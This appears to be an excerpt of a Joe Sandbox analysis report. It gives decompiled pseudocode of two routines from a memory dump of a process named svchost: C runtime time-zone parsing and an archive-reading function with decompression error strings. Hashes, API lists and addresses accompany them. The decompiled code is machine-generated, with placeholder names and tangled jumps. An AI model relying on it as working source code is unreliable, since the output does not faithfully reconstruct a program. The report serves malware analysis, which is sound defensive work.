                            control_flow_graph 215 bdafbe-bdafe6 call bdabfc call bdac5a 220 bdafec-bdaff8 call bdac02 215->220 221 bdb186-bdb1bb call bd1798 call bdabfc call bdac5a 215->221 220->221 226 bdaffe-bdb009 220->226 244 bdb1c1-bdb1cd call bdac02 221->244 245 bdb2e3-bdb33f call bd1798 call bd6cc0 221->245 229 bdb03f-bdb048 call bd09eb 226->229 230 bdb00b-bdb00d 226->230 238 bdb04b-bdb050 229->238 233 bdb00f-bdb013 230->233 236 bdb02f-bdb031 233->236 237 bdb015-bdb017 233->237 242 bdb034-bdb036 236->242 240 bdb019-bdb01f 237->240 241 bdb02b-bdb02d 237->241 238->238 243 bdb052-bdb073 call bd0a25 call bd09eb 238->243 240->236 246 bdb021-bdb029 240->246 241->242 247 bdb03c 242->247 248 bdb180-bdb185 242->248 243->248 262 bdb079-bdb07c 243->262 244->245 257 bdb1d3-bdb1df call bdac2e 244->257 264 bdb349-bdb34c 245->264 265 bdb341-bdb347 245->265 246->233 246->241 247->229 257->245 267 bdb1e5-bdb206 call bd09eb GetTimeZoneInformation 257->267 266 bdb07f-bdb084 262->266 268 bdb38f-bdb3a1 264->268 269 bdb34e-bdb35e call bd0a25 264->269 265->268 266->266 270 bdb086-bdb098 call bd0a73 266->270 280 bdb20c-bdb22d 267->280 281 bdb2bf-bdb2e2 call bdabf6 call bdabea call bdabf0 267->281 273 bdb3b1 call bdb193 268->273 274 bdb3a3-bdb3a6 268->274 283 bdb368-bdb381 call bd6cc0 269->283 284 bdb360 269->284 270->221 287 bdb09e-bdb0b1 call bd50a9 270->287 290 bdb3b6-bdb3cd call bd09eb call bc786a 273->290 274->273 278 bdb3a8-bdb3af call bdafbe 274->278 278->290 288 bdb22f-bdb234 280->288 289 bdb237-bdb23e 280->289 310 bdb386-bdb38c call bd09eb 283->310 311 bdb383-bdb384 283->311 294 bdb361-bdb366 call bd09eb 284->294 287->221 306 bdb0b7-bdb0ba 287->306 288->289 291 bdb256-bdb259 289->291 292 bdb240-bdb247 289->292 304 bdb25c-bdb27d call bd7d59 WideCharToMultiByte 291->304 292->291 299 bdb249-bdb254 292->299 317 bdb38e 294->317 299->304 323 bdb27f-bdb282 304->323 324 bdb28b-bdb28d 304->324 313 bdb0bc-bdb0c0 306->313 314 bdb0c2-bdb0cb 306->314 310->317 311->294 313->306 313->314 321 bdb0cd 314->321 322 bdb0ce-bdb0db call bd1594 314->322 317->268 321->322 332 bdb0de-bdb0e2 322->332 323->324 328 bdb284-bdb289 323->328 326 bdb28f-bdb2ab WideCharToMultiByte 324->326 330 bdb2ad-bdb2b0 326->330 331 bdb2ba-bdb2bd 326->331 328->326 330->331 333 bdb2b2-bdb2b8 330->333 331->281 334 bdb0ec-bdb0ed 332->334 335 bdb0e4-bdb0e6 332->335 333->281 334->332 336 bdb0ef-bdb0f2 335->336 337 bdb0e8-bdb0ea 335->337 338 bdb0f4-bdb107 call bd1594 336->338 339 bdb136-bdb138 336->339 337->334 337->336 348 bdb10e-bdb112 338->348 340 bdb13f-bdb14e 339->340 341 bdb13a-bdb13c 339->341 343 bdb166-bdb169 340->343 344 bdb150-bdb162 call bd50a9 340->344 341->340 346 bdb16c-bdb17e call bdabf6 call bdabea 343->346 344->346 356 bdb164 344->356 346->248 350 bdb109-bdb10b 348->350 351 bdb114-bdb117 348->351 350->351 353 bdb10d 350->353 351->339 355 bdb119-bdb129 call bd1594 351->355 353->348 361 bdb130-bdb134 355->361 356->221 361->339 362 bdb12b-bdb12d 361->362 362->339 363 bdb12f 362->363 363->361
                            C-Code - Quality: 78%
                            			E00BDAFBE(void* __eflags, signed int _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				int _v20;
				int _v24;
				char _v52;
				int _v56;
				int _v60;
				signed int _v100;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v356;
				char _v360;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t65;
				signed int _t72;
				signed int _t74;
				signed int _t78;
				void* _t80;
				signed int _t84;
				signed int _t88;
				signed int _t90;
				long _t92;
				signed int* _t95;
				signed int _t98;
				signed int _t101;
				signed int _t105;
				void* _t112;
				signed int _t115;
				void* _t116;
				void* _t118;
				void* _t119;
				void* _t121;
				signed int _t123;
				signed int _t124;
				signed int _t127;
				void* _t130;
				void* _t132;
				signed int _t133;
				signed int _t135;
				void* _t141;
				intOrPtr _t142;
				void* _t144;
				signed int _t151;
				signed int _t152;
				signed int _t155;
				signed int _t159;
				signed int _t162;
				intOrPtr* _t167;
				intOrPtr _t168;
				signed int _t169;
				intOrPtr* _t170;
				void* _t171;
				void* _t172;
				signed int _t173;
				int _t177;
				signed int _t179;
				char** _t180;
				signed int _t184;
				signed int _t186;
				void* _t195;
				signed int _t196;
				void* _t197;
				signed int _t198;

				_push(_t179);
				_t65 = E00BDABFC();
				_v8 = _v8 & 0x00000000;
				_t135 = _t65;
				_v16 = _v16 & 0x00000000;
				_v12 = _t135;
				if(E00BDAC5A( &_v8) != 0 || E00BDAC02( &_v16) != 0) {
					L46:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00BD1798();
					asm("int3");
					_t195 = _t197;
					_t198 = _t197 - 0x10;
					_push(_t135);
					_t180 = E00BDABFC();
					_v52 = 0;
					_v56 = 0;
					_v60 = 0;
					_t72 = E00BDAC5A( &_v52);
					_t144 = _t179;
					__eflags = _t72;
					if(_t72 != 0) {
						L66:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E00BD1798();
						asm("int3");
						_push(_t195);
						_t196 = _t198;
						_t74 =  *0xbec008; // 0xdc55bb75
						_v100 = _t74 ^ _t196;
						 *0xbec91c =  *0xbec91c | 0xffffffff;
						 *0xbec910 =  *0xbec910 | 0xffffffff;
						_push(0);
						_push(_t180);
						_push(_t172);
						_t137 = "TZ";
						_t173 = 0;
						 *0xbf6578 = 0;
						_t78 = E00BD6CC0("TZ", _t168, 0, _t180, __eflags,  &_v360,  &_v356, 0x100, "TZ");
						__eflags = _t78;
						if(_t78 != 0) {
							__eflags = _t78 - 0x22;
							if(_t78 == 0x22) {
								_t186 = E00BD0A25(_t144, _v276);
								__eflags = _t186;
								if(__eflags != 0) {
									_t84 = E00BD6CC0(_t137, _t168, 0, _t186, __eflags,  &_v280, _t186, _v276, _t137);
									__eflags = _t84;
									if(_t84 == 0) {
										E00BD09EB(0);
										_t173 = _t186;
									} else {
										_push(_t186);
										goto L72;
									}
								} else {
									_push(0);
									L72:
									E00BD09EB();
								}
							}
						} else {
							_t173 =  &_v272;
						}
						asm("sbb esi, esi");
						_t184 =  ~(_t173 -  &_v272) & _t173;
						__eflags = _t173;
						if(_t173 == 0) {
							L80:
							L47(); // executed
						} else {
							__eflags =  *_t173;
							if(__eflags == 0) {
								goto L80;
							} else {
								_push(_t173);
								E00BDAFBE(__eflags);
							}
						}
						_t80 = E00BD09EB(_t184);
						__eflags = _v16 ^ _t196;
						E00BC786A();
						return _t80;
					} else {
						_t88 = E00BDAC02( &_v16);
						_pop(_t144);
						__eflags = _t88;
						if(_t88 != 0) {
							goto L66;
						} else {
							_t90 = E00BDAC2E( &_v20);
							_pop(_t144);
							__eflags = _t90;
							if(_t90 != 0) {
								goto L66;
							} else {
								E00BD09EB( *0xbf6574);
								 *0xbf6574 = 0;
								 *_t198 = 0xbf6580; // executed
								_t92 = GetTimeZoneInformation(??); // executed
								__eflags = _t92 - 0xffffffff;
								if(_t92 != 0xffffffff) {
									_t151 =  *0xbf6580 * 0x3c;
									_t169 =  *0xbf65d4; // 0x0
									_push(_t172);
									 *0xbf6578 = 1;
									_v12 = _t151;
									__eflags =  *0xbf65c6; // 0xb
									if(__eflags != 0) {
										_t152 = _t151 + _t169 * 0x3c;
										__eflags = _t152;
										_v12 = _t152;
									}
									__eflags =  *0xbf661a; // 0x3
									if(__eflags == 0) {
										L56:
										_v16 = 0;
										_v20 = 0;
									} else {
										_t105 =  *0xbf6628; // 0xffffffc4
										__eflags = _t105;
										if(_t105 == 0) {
											goto L56;
										} else {
											_v16 = 1;
											_v20 = (_t105 - _t169) * 0x3c;
										}
									}
									_t177 = E00BD7D59(0, _t169);
									_t98 = WideCharToMultiByte(_t177, 0, "Pacific Standard Time", 0xffffffff,  *_t180, 0x3f, 0,  &_v24);
									__eflags = _t98;
									if(_t98 == 0) {
										L60:
										 *( *_t180) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L60;
										} else {
											( *_t180)[0x3f] = 0;
										}
									}
									_t101 = WideCharToMultiByte(_t177, 0, "Pacific Daylight Time", 0xffffffff, _t180[1], 0x3f, 0,  &_v24);
									__eflags = _t101;
									if(_t101 == 0) {
										L64:
										 *(_t180[1]) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L64;
										} else {
											_t180[1][0x3f] = 0;
										}
									}
								}
								 *(E00BDABF6()) = _v12;
								 *((intOrPtr*)(E00BDABEA())) = _v16;
								_t95 = E00BDABF0();
								 *_t95 = _v20;
								return _t95;
							}
						}
					}
				} else {
					_t170 =  *0xbf6574; // 0x0
					_t179 = _a4;
					if(_t170 == 0) {
						L12:
						E00BD09EB(_t170);
						_t155 = _t179;
						_t12 = _t155 + 1; // 0xbdb3af
						_t171 = _t12;
						do {
							_t112 =  *_t155;
							_t155 = _t155 + 1;
						} while (_t112 != 0);
						_t13 = _t155 - _t171 + 1; // 0xbdb3b0
						 *0xbf6574 = E00BD0A25(_t155 - _t171, _t13);
						_t115 = E00BD09EB(0);
						_t168 =  *0xbf6574; // 0x0
						if(_t168 == 0) {
							goto L45;
						} else {
							_t159 = _t179;
							_push(_t172);
							_t14 = _t159 + 1; // 0xbdb3af
							_t172 = _t14;
							do {
								_t116 =  *_t159;
								_t159 = _t159 + 1;
							} while (_t116 != 0);
							_t15 = _t159 - _t172 + 1; // 0xbdb3b0
							_t118 = E00BD0A73(_t168, _t15, _t179);
							_t197 = _t197 + 0xc;
							if(_t118 != 0) {
								goto L46;
							} else {
								_t172 = 3;
								_push(_t172);
								_t119 = E00BD50A9(_t160,  *_t135, 0x40, _t179);
								_t197 = _t197 + 0x10;
								if(_t119 != 0) {
									goto L46;
								} else {
									while( *_t179 != 0) {
										_t179 = _t179 + 1;
										_t172 = _t172 - 1;
										if(_t172 != 0) {
											continue;
										}
										break;
									}
									_pop(_t172);
									_t135 = _t135 & 0xffffff00 |  *_t179 == 0x0000002d;
									if(_t135 != 0) {
										_t179 = _t179 + 1;
									}
									_t162 = E00BD1594(_t160, _t179) * 0xe10;
									_v8 = _t162;
									while(1) {
										_t121 =  *_t179;
										if(_t121 != 0x2b && (_t121 < 0x30 || _t121 > 0x39)) {
											break;
										}
										_t179 = _t179 + 1;
									}
									__eflags =  *_t179 - 0x3a;
									if( *_t179 == 0x3a) {
										_t179 = _t179 + 1;
										_t162 = _v8 + E00BD1594(_t162, _t179) * 0x3c;
										_v8 = _t162;
										while(1) {
											_t130 =  *_t179;
											__eflags = _t130 - 0x30;
											if(_t130 < 0x30) {
												break;
											}
											__eflags = _t130 - 0x39;
											if(_t130 <= 0x39) {
												_t179 = _t179 + 1;
												__eflags = _t179;
												continue;
											}
											break;
										}
										__eflags =  *_t179 - 0x3a;
										if( *_t179 == 0x3a) {
											_t179 = _t179 + 1;
											_t162 = _v8 + E00BD1594(_t162, _t179);
											_v8 = _t162;
											while(1) {
												_t132 =  *_t179;
												__eflags = _t132 - 0x30;
												if(_t132 < 0x30) {
													goto L38;
												}
												__eflags = _t132 - 0x39;
												if(_t132 <= 0x39) {
													_t179 = _t179 + 1;
													__eflags = _t179;
													continue;
												}
												goto L38;
											}
										}
									}
									L38:
									__eflags = _t135;
									if(_t135 != 0) {
										_v8 = _t162;
									}
									__eflags =  *_t179;
									_t123 = 0 |  *_t179 != 0x00000000;
									_v16 = _t123;
									__eflags = _t123;
									_t124 = _v12;
									if(_t123 == 0) {
										_t29 = _t124 + 4; // 0xfffffddd
										 *((char*)( *_t29)) = 0;
										goto L44;
									} else {
										_push(3);
										_t28 = _t124 + 4; // 0xfffffddd
										_t127 = E00BD50A9(_t162,  *_t28, 0x40, _t179);
										_t197 = _t197 + 0x10;
										__eflags = _t127;
										if(_t127 == 0) {
											L44:
											 *(E00BDABF6()) = _v8;
											_t115 = E00BDABEA();
											 *_t115 = _v16;
											goto L45;
										} else {
											goto L46;
										}
									}
								}
							}
						}
					} else {
						_t167 = _t170;
						_t133 = _t179;
						while(1) {
							_t141 =  *_t133;
							if(_t141 !=  *_t167) {
								break;
							}
							if(_t141 == 0) {
								L8:
								_t115 = 0;
							} else {
								_t9 = _t133 + 1; // 0xdde805eb
								_t142 =  *_t9;
								if(_t142 !=  *((intOrPtr*)(_t167 + 1))) {
									break;
								} else {
									_t133 = _t133 + 2;
									_t167 = _t167 + 2;
									if(_t142 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t115 == 0) {
								L45:
								return _t115;
							} else {
								_t135 = _v12;
								goto L12;
							}
							goto L82;
						}
						asm("sbb eax, eax");
						_t115 = _t133 | 0x00000001;
						__eflags = _t115;
						goto L10;
					}
				}
				L82:
			}







































































                            0x00bdafc7
                            0x00bdafc8
                            0x00bdafcd
                            0x00bdafd1
                            0x00bdafd3
                            0x00bdafdb
                            0x00bdafe6
                            0x00bdb186
                            0x00bdb188
                            0x00bdb189
                            0x00bdb18a
                            0x00bdb18b
                            0x00bdb18c
                            0x00bdb18d
                            0x00bdb192
                            0x00bdb196
                            0x00bdb198
                            0x00bdb19b
                            0x00bdb1a2
                            0x00bdb1a9
                            0x00bdb1ad
                            0x00bdb1b0
                            0x00bdb1b3
                            0x00bdb1b8
                            0x00bdb1b9
                            0x00bdb1bb
                            0x00bdb2e3
                            0x00bdb2e3
                            0x00bdb2e4
                            0x00bdb2e5
                            0x00bdb2e6
                            0x00bdb2e7
                            0x00bdb2e8
                            0x00bdb2ed
                            0x00bdb2f0
                            0x00bdb2f1
                            0x00bdb2f9
                            0x00bdb300
                            0x00bdb303
                            0x00bdb310
                            0x00bdb317
                            0x00bdb318
                            0x00bdb319
                            0x00bdb31a
                            0x00bdb31f
                            0x00bdb32e
                            0x00bdb335
                            0x00bdb33d
                            0x00bdb33f
                            0x00bdb349
                            0x00bdb34c
                            0x00bdb359
                            0x00bdb35c
                            0x00bdb35e
                            0x00bdb377
                            0x00bdb37f
                            0x00bdb381
                            0x00bdb387
                            0x00bdb38c
                            0x00bdb383
                            0x00bdb383
                            0x00000000
                            0x00bdb383
                            0x00bdb360
                            0x00bdb360
                            0x00bdb361
                            0x00bdb361
                            0x00bdb361
                            0x00bdb38e
                            0x00bdb341
                            0x00bdb341
                            0x00bdb341
                            0x00bdb39b
                            0x00bdb39d
                            0x00bdb39f
                            0x00bdb3a1
                            0x00bdb3b1
                            0x00bdb3b1
                            0x00bdb3a3
                            0x00bdb3a3
                            0x00bdb3a6
                            0x00000000
                            0x00bdb3a8
                            0x00bdb3a8
                            0x00bdb3a9
                            0x00bdb3ae
                            0x00bdb3a6
                            0x00bdb3b7
                            0x00bdb3c2
                            0x00bdb3c5
                            0x00bdb3cd
                            0x00bdb1c1
                            0x00bdb1c5
                            0x00bdb1ca
                            0x00bdb1cb
                            0x00bdb1cd
                            0x00000000
                            0x00bdb1d3
                            0x00bdb1d7
                            0x00bdb1dc
                            0x00bdb1dd
                            0x00bdb1df
                            0x00000000
                            0x00bdb1e5
                            0x00bdb1eb
                            0x00bdb1f0
                            0x00bdb1f6
                            0x00bdb1fd
                            0x00bdb203
                            0x00bdb206
                            0x00bdb20c
                            0x00bdb213
                            0x00bdb219
                            0x00bdb21d
                            0x00bdb223
                            0x00bdb226
                            0x00bdb22d
                            0x00bdb232
                            0x00bdb232
                            0x00bdb234
                            0x00bdb234
                            0x00bdb237
                            0x00bdb23e
                            0x00bdb256
                            0x00bdb256
                            0x00bdb259
                            0x00bdb240
                            0x00bdb240
                            0x00bdb245
                            0x00bdb247
                            0x00000000
                            0x00bdb249
                            0x00bdb24b
                            0x00bdb251
                            0x00bdb251
                            0x00bdb247
                            0x00bdb261
                            0x00bdb275
                            0x00bdb27b
                            0x00bdb27d
                            0x00bdb28b
                            0x00bdb28d
                            0x00bdb27f
                            0x00bdb27f
                            0x00bdb282
                            0x00000000
                            0x00bdb284
                            0x00bdb286
                            0x00bdb286
                            0x00bdb282
                            0x00bdb2a2
                            0x00bdb2a9
                            0x00bdb2ab
                            0x00bdb2ba
                            0x00bdb2bd
                            0x00bdb2ad
                            0x00bdb2ad
                            0x00bdb2b0
                            0x00000000
                            0x00bdb2b2
                            0x00bdb2b5
                            0x00bdb2b5
                            0x00bdb2b0
                            0x00bdb2ab
                            0x00bdb2c7
                            0x00bdb2d1
                            0x00bdb2d6
                            0x00bdb2db
                            0x00bdb2e2
                            0x00bdb2e2
                            0x00bdb1df
                            0x00bdb1cd
                            0x00bdaffe
                            0x00bdaffe
                            0x00bdb004
                            0x00bdb009
                            0x00bdb03f
                            0x00bdb040
                            0x00bdb046
                            0x00bdb048
                            0x00bdb048
                            0x00bdb04b
                            0x00bdb04b
                            0x00bdb04d
                            0x00bdb04e
                            0x00bdb054
                            0x00bdb05f
                            0x00bdb064
                            0x00bdb069
                            0x00bdb073
                            0x00000000
                            0x00bdb079
                            0x00bdb079
                            0x00bdb07b
                            0x00bdb07c
                            0x00bdb07c
                            0x00bdb07f
                            0x00bdb07f
                            0x00bdb081
                            0x00bdb082
                            0x00bdb089
                            0x00bdb08e
                            0x00bdb093
                            0x00bdb098
                            0x00000000
                            0x00bdb09e
                            0x00bdb0a0
                            0x00bdb0a1
                            0x00bdb0a7
                            0x00bdb0ac
                            0x00bdb0b1
                            0x00000000
                            0x00bdb0b7
                            0x00bdb0b7
                            0x00bdb0bc
                            0x00bdb0bd
                            0x00bdb0c0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bdb0c0
                            0x00bdb0c5
                            0x00bdb0c6
                            0x00bdb0cb
                            0x00bdb0cd
                            0x00bdb0cd
                            0x00bdb0d5
                            0x00bdb0db
                            0x00bdb0de
                            0x00bdb0de
                            0x00bdb0e2
                            0x00000000
                            0x00000000
                            0x00bdb0ec
                            0x00bdb0ec
                            0x00bdb0ef
                            0x00bdb0f2
                            0x00bdb0f4
                            0x00bdb102
                            0x00bdb104
                            0x00bdb10e
                            0x00bdb10e
                            0x00bdb110
                            0x00bdb112
                            0x00000000
                            0x00000000
                            0x00bdb109
                            0x00bdb10b
                            0x00bdb10d
                            0x00bdb10d
                            0x00000000
                            0x00bdb10d
                            0x00000000
                            0x00bdb10b
                            0x00bdb114
                            0x00bdb117
                            0x00bdb119
                            0x00bdb124
                            0x00bdb126
                            0x00bdb130
                            0x00bdb130
                            0x00bdb132
                            0x00bdb134
                            0x00000000
                            0x00000000
                            0x00bdb12b
                            0x00bdb12d
                            0x00bdb12f
                            0x00bdb12f
                            0x00000000
                            0x00bdb12f
                            0x00000000
                            0x00bdb12d
                            0x00bdb130
                            0x00bdb117
                            0x00bdb136
                            0x00bdb136
                            0x00bdb138
                            0x00bdb13c
                            0x00bdb13c
                            0x00bdb141
                            0x00bdb143
                            0x00bdb146
                            0x00bdb149
                            0x00bdb14b
                            0x00bdb14e
                            0x00bdb166
                            0x00bdb169
                            0x00000000
                            0x00bdb150
                            0x00bdb150
                            0x00bdb155
                            0x00bdb158
                            0x00bdb15d
                            0x00bdb160
                            0x00bdb162
                            0x00bdb16c
                            0x00bdb174
                            0x00bdb179
                            0x00bdb17e
                            0x00000000
                            0x00bdb164
                            0x00000000
                            0x00bdb164
                            0x00bdb162
                            0x00bdb14e
                            0x00bdb0b1
                            0x00bdb098
                            0x00bdb00b
                            0x00bdb00b
                            0x00bdb00d
                            0x00bdb00f
                            0x00bdb00f
                            0x00bdb013
                            0x00000000
                            0x00000000
                            0x00bdb017
                            0x00bdb02b
                            0x00bdb02b
                            0x00bdb019
                            0x00bdb019
                            0x00bdb019
                            0x00bdb01f
                            0x00000000
                            0x00bdb021
                            0x00bdb021
                            0x00bdb024
                            0x00bdb029
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bdb029
                            0x00bdb01f
                            0x00bdb034
                            0x00bdb036
                            0x00bdb180
                            0x00bdb185
                            0x00bdb03c
                            0x00bdb03c
                            0x00000000
                            0x00bdb03c
                            0x00000000
                            0x00bdb036
                            0x00bdb02f
                            0x00bdb031
                            0x00bdb031
                            0x00000000
                            0x00bdb031
                            0x00bdb009
                            0x00000000

                            APIs
                            • _free.LIBCMT ref: 00BDB040
                            • _free.LIBCMT ref: 00BDB064
                            • _free.LIBCMT ref: 00BDB1EB
                            • GetTimeZoneInformation.KERNELBASE(?,00000000,00000000,00000000,?,00BE9410), ref: 00BDB1FD
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Standard Time,000000FF,00000000,0000003F,00000000,?,?), ref: 00BDB275
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Daylight Time,000000FF,?,0000003F,00000000,?), ref: 00BDB2A2
                            • _free.LIBCMT ref: 00BDB3B7
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
                            • String ID: Pacific Daylight Time$Pacific Standard Time
                            • API String ID: 314583886-1154798116
                            • Opcode ID: bd40790ce95cf15aba968211b4bcffbbbb99c74a48d51a3cdf70c41147a69ab7
                            • Instruction ID: 101df5595170c555dca53a3128017a6c3a75d5103b1b8f59af01a1da50abf2ba
                            • Opcode Fuzzy Hash: bd40790ce95cf15aba968211b4bcffbbbb99c74a48d51a3cdf70c41147a69ab7
                            • Instruction Fuzzy Hash: 34C1E172900249EBDB249F688891EAEFBE9EF55350F1541EBE894A7352FB308E41C750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BC1220, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 101COMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 55%
                            			E00BC1220(void* __ecx, void* __edx) {
				void* __ebp;
				intOrPtr _t10;
				void* _t12;
				intOrPtr _t13;
				void* _t14;
				intOrPtr _t15;
				intOrPtr _t32;
				void* _t37;
				void* _t38;
				intOrPtr* _t39;
				intOrPtr _t41;
				intOrPtr _t44;
				void* _t49;
				void* _t51;
				void* _t52;

				_t38 = __edx;
				_t37 = __ecx;
				_t39 =  *((intOrPtr*)(_t49 + 8));
				if( *_t39 != 0) {
					L3:
					_t44 =  *((intOrPtr*)(_t49 + 0x14));
					_push(0);
					L00BC7864();
					_t12 = E00BC9F16(_t38,  *_t39, _t10 +  *((intOrPtr*)(_t39 + 4)),  *((intOrPtr*)(_t44 + 4))); // executed
					_push( *((intOrPtr*)(_t44 + 8)));
					L00BC7864();
					_push(_t12); // executed
					_t13 = E00BC9808(_t37); // executed
					_t32 = _t13;
					_t51 = _t49 + 0x10;
					__eflags = _t32;
					if(__eflags != 0) {
						_push( *_t39);
						L00BC7864();
						_t14 = E00BC9B2B(_t32, _t13,  *((intOrPtr*)(_t44 + 8)), 1); // executed
						_t52 = _t51 + 0x10;
						__eflags = _t14 - 1;
						if(__eflags >= 0) {
							__eflags =  *((char*)(_t44 + 0x10)) - 1;
							if(__eflags != 0) {
								L10:
								_t15 =  *_t39;
								__eflags = _t15;
								if(__eflags != 0) {
									_push(_t15); // executed
									E00BC9889(_t37, _t38, __eflags); // executed
									 *_t39 = 0;
								}
								return _t32;
							} else {
								_push(_t44);
								_t41 = E00BC1030(_t14, _t37, __eflags, _t32); // executed
								L00BC9803(_t32); // executed
								_t52 = _t52 + 0xc;
								_t32 = _t41;
								__eflags = _t41;
								if(__eflags != 0) {
									goto L10;
								} else {
									E00BC1980(__eflags, "Error decompressing %s\n", _t44 + 0x12);
									__eflags = 0;
									return 0;
								}
							}
						} else {
							_push("Could not read from file\n");
							E00BC1980(__eflags);
							L00BC9803(_t32);
							__eflags = 0;
							return 0;
						}
					} else {
						_push("Could not allocate read buffer\n");
						E00BC1980(__eflags);
						__eflags = 0;
						return 0;
					}
				} else {
					_t10 = E00BC28C0(_t39 + 0x68, "rb");
					_t49 = _t49 + 8;
					 *_t39 = _t10;
					_t59 = _t10;
					if(_t10 != 0) {
						goto L3;
					} else {
						_push("Cannot open archive file\n");
						E00BC1980(_t59);
						return 0;
					}
				}
			}


















                            0x00bc1220
                            0x00bc1220
                            0x00bc1221
                            0x00bc1228
                            0x00bc1252
                            0x00bc1254
                            0x00bc1258
                            0x00bc125d
                            0x00bc1268
                            0x00bc1270
                            0x00bc1273
                            0x00bc1278
                            0x00bc1279
                            0x00bc127e
                            0x00bc1280
                            0x00bc1283
                            0x00bc1285
                            0x00bc129a
                            0x00bc12a1
                            0x00bc12a8
                            0x00bc12ad
                            0x00bc12b0
                            0x00bc12b3
                            0x00bc12ce
                            0x00bc12d2
                            0x00bc1305
                            0x00bc1305
                            0x00bc1307
                            0x00bc1309
                            0x00bc130b
                            0x00bc130c
                            0x00bc1314
                            0x00bc1314
                            0x00bc131f
                            0x00bc12d4
                            0x00bc12d5
                            0x00bc12dd
                            0x00bc12df
                            0x00bc12e4
                            0x00bc12e7
                            0x00bc12e9
                            0x00bc12ec
                            0x00000000
                            0x00bc12ee
                            0x00bc12f7
                            0x00bc12ff
                            0x00bc1304
                            0x00bc1304
                            0x00bc12ec
                            0x00bc12b5
                            0x00bc12b5
                            0x00bc12ba
                            0x00bc12c0
                            0x00bc12c8
                            0x00bc12cd
                            0x00bc12cd
                            0x00bc1287
                            0x00bc1287
                            0x00bc128c
                            0x00bc1294
                            0x00bc1299
                            0x00bc1299
                            0x00bc122a
                            0x00bc1233
                            0x00bc1238
                            0x00bc123b
                            0x00bc123d
                            0x00bc123f
                            0x00000000
                            0x00bc1241
                            0x00bc1241
                            0x00bc1246
                            0x00bc1251
                            0x00bc1251
                            0x00bc123f

                            APIs
                            Strings
                            • Could not allocate read buffer, xrefs: 00BC1287
                            • Cannot open archive file, xrefs: 00BC1241
                            • Error decompressing %s, xrefs: 00BC12F2
                            • Could not read from file, xrefs: 00BC12B5
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: htonl$__fread_nolock
                            • String ID: Cannot open archive file$Could not allocate read buffer$Could not read from file$Error decompressing %s
                            • API String ID: 3757756281-3387914768
                            • Opcode ID: 0a1ae102b5dc8fd20d7c54bdcf57ce6a9c195acfd7983c4d0a0c6dbaa97a9e59
                            • Instruction ID: 2bc9e8a908702293df9303059d4bd4932d1db51ea6edca98a05496920bb14261
                            • Opcode Fuzzy Hash: 0a1ae102b5dc8fd20d7c54bdcf57ce6a9c195acfd7983c4d0a0c6dbaa97a9e59
                            • Instruction Fuzzy Hash: 43210BB2A042057AFB007A79BC46F5EB7CCEF52354F5409F9F904E1203FBA2D9508661
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BDB193, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 171timeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
